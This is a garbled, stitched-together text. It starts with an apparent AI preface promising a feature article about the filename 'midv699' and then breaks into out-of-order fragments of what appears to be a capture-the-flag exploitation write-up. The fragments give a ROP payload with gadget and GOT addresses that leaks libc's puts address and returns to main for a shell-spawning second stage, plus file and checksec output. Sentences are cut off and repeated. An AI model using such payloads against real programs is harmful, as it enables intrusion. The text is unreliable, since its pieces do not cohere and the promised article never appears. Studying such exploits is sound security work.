Since "midv699" appears to be a file or code identifier (common in certain creative repositories) rather than a widely recognized public title, I have interpreted this request as a prompt to write a feature article based on the themes suggested by the filename structure (technology, obsolescence, and hidden data).
Here is a feature article based on that concept. midv699 full
puts addressWe build the first ROP payload:
[padding (72)]
pop rdi ; ret -> address: 0x4014b3
<puts@got address> -> 0x601028 (found via `readelf -r` or `objdump -R`)
puts@plt -> 0x400670
pop rdi ; ret -> 0x4014b3 (to set up argument for next read)
<main> -> 0x4011f0 (restart the menu)
Explanation:
puts from the GOT into RDI (first argument to puts).puts@plt → prints the real address of puts from libc.main so we can send a second payload (the actual shell‑spawn).midv699-fullmidv699-full (ELF 64‑bit, stripped)libc.so.6 (the exact glibc version used on the remote host)stdout as HTB...).The binary is a simple interactive “menu” program that reads user input, performs a few checks, and then calls a vulnerable function. The source code is not provided, so we rely on reverse‑engineering. Since "midv699" appears to be a file or
$ file midv699-full
midv699-full: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, stripped
$ checksec --file=midv699-full
[*] RELRO : Partial RELRO
[*] Stack Canary : No canary found
[*] NX : Enabled
[*] PIE : No PIE
[*] Fortify Source : No
Key observations: